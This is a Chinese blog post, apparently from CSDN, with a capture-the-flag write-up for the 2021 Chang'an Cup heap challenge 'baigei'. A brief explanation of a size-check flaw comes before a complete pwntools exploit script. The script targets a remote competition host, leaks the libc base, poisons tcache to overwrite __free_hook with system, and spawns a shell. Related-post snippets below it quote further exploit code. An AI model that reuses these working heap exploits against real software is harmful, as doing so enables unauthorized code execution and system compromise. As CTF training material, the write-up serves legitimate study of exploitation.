2021 长安杯 pwn baigei

最新推荐文章于 2023-03-19 11:03:00 发布
最新推荐文章于 2023-03-19 11:03:00 发布
阅读量371 收藏
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/120481967
版权

在这里插入图片描述

菜单堆

在这里插入图片描述
在这里插入图片描述
问题就出在当我们输入size之后,size会留下来然后才判断符不符合要求。
所以直接可以堆溢出。

exp

from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

local = 0
if local:
    r = process('./main')
else:
    r = remote("113.201.14.253",21111)
    
libc=ELF('/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.4_amd64/libc.so.6')

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda name,addr :log.success(name+":"+hex(addr))

def debug():
    gdb.attach(r)
    pause()

def add(idx, size, content):
    sla(">>\n", "1")
    sla("idx?\n", str(idx))
    sla("size?\n", str(size))
    sa("content?\n", content)
    
def fake_add(idx, size):
    sla(">>\n", "1")
    sla("idx?\n", str(idx))
    sla("size?\n", str(size))
    
    
def delete(idx):
    sla(">>\n", "2")
    sla("idx?\n", str(idx))

def edit(idx, size, content):
    sla(">>\n", "3")
    sla("idx?\n", str(idx))
    sla("size?\n", str(size))
    sa("content?\n", content)

def show(idx):
    sla(">>\n", "4")
    sla("idx?\n", str(idx))

for i in range(8):
    add(i, 0xf8, "a")

add(8, 0x10, "a")

for i in range(8):
    delete(i)

for i in range(7):
    add(i, 0xf8, "a")

fake_add(0, 0x500)
edit(0, 0x300, "a" * 0x100)
 
show(0)
malloc_hook = (u64(ru('\x7f')[-6:] + '\x00\x00') & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
lg("libc_base", libc_base)


delete(2)
fake_add(3, 0x500)

edit(3, 0x300, "a" * 0xf8 + p64(0x101) + p64(free_hook))
add(2, 0xf8, "/bin/sh\x00")
add(9, 0xf8, p64(system_addr))

delete(2)

r.interactive()
yongbaoii
关注
专栏目录
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2101
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
pwn2021 祥云杯 (部分)
woodwhale的博客
10-07 4215
pwn2021 祥云杯 (部分) 前言 国庆的最后几天,一直在补题,发现祥云杯那个时候一道堆题都不会,直接开始补题。 补题过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云杯里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
pwn长安杯baigei
woodwhale的博客
10-03 3437
pwn长安杯baigei 前言 这场和das月赛重了,当时这个baigei题没仔细看,长安杯就解了两道jar包web的送分题,国庆开始补题 漏洞分析 最基本的菜单,增删改查都有的那种,漏洞在于add中的size即使是error的,也会被Size数组记录 并且之后的edit中,只会比较更改后的size和Size数组中的size的大小 如果我们将Size数组中的size写成非常大的,那么我们可以随意edit从而进行堆溢出 改一个chunk头为0x431,放入unsortedbin,add一个0x400进行u
2021长安杯-高校组-Crypto-easyrsa-Wp
mxx307的博客
09-28 789
目录一、题目二、分析1.`add()`函数2.`mul()`函数3.解题思路Ⅰ.分解Ⅱ.验证Ⅲ.储存三、题解四、总结 这次比赛太惨了,终究还是我太次了呀。一道密码都没出,esayrsa一点也不easy,这题还是赛后一个半小时候后出的。 一、题目 from Crypto.Util.number import * def add(a,b): if(a<b): a0 = str(b).encode() b0 = str(a).encode() else:
PWN入门(1)基础知识和环境设置
Ba1_Ma0的博客
09-07 4570
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
pwn入门
weixin_74485208的博客
03-19 1682
CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。接下来介绍相关的学习思路(自己总结的,当作参考)
Pwn 学习
qq_41672971的博客
09-26 1374
windows pwn
2021长安抗疫杯签到pwn
pointerr的博客
01-20 229
checksec: 发现32位,开了NX,没别的保护,使用ida打开: 发现打印出了一个gift,直接运行,竟然是buf的栈地址。 binsh地址也知道了, 首先填充栈,其中一开始是binsh的地址, 然后填充栈,最后覆盖ebp为栈地址 思路直接打开: from pwn import* p = process("./pwn1") #p = remote("113.201.14.253",16088) p.recvuntil("Gift:") leak = int(p.recv(10),16) p.sen
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1609
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6047
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
攻防世界PWN之bufoverflow_b题解
seaaseesa的博客
02-19 774
bufoverflow_b 这题和bufferoverflow_a类似,只是在输入的时候,增加了一个检查 遇到空字符就会截断,这将不利于我们在chunk里伪造数据。 另外增加了一个功能,不过我没有使用到。 遇到’\x00’就会截断,但是我们仍然可以完整的把我们的伪造数据放进去。 比如,我们要在偏移0x30处写一个数据0x0000000000123456,我们先把0x30处的8字节...
Linux pwn入门教程,pwn堆入门系列教程1
weixin_29015899的博客
05-02 538
pwn堆入门系列教程1因为自己学堆的时候,找不到一个系统的教程,我将会按照ctf-wiki的目录一步步学下去,尽量做到每周有更新,方便跟我一样刚入门堆的人学习,第一篇教程研究了4天吧,途中没人指导。。很尴尬,自己一个很容易的点研究了很久才懂,把踩过的坑也总结下,方便后人不再踩坑学习链接环境搭建off by one原理(引用ctf-wiki)off-by-one 是指单字节缓冲区溢出,这种漏洞的产生...
2021长安杯Wp(个人详细总结)
恒Keep毅
10-27 5443
更新了仓库地址
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 8329
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 7027
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
linux 安装codeql环境 (二)codeql database create通过报错分析其流程
yongbaoii的博客
04-10 5892
尝试过很多解决方案之后无果 决定研究一下它的整个流程
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 5653
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
2023 羊城杯 pwn
最新发布
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值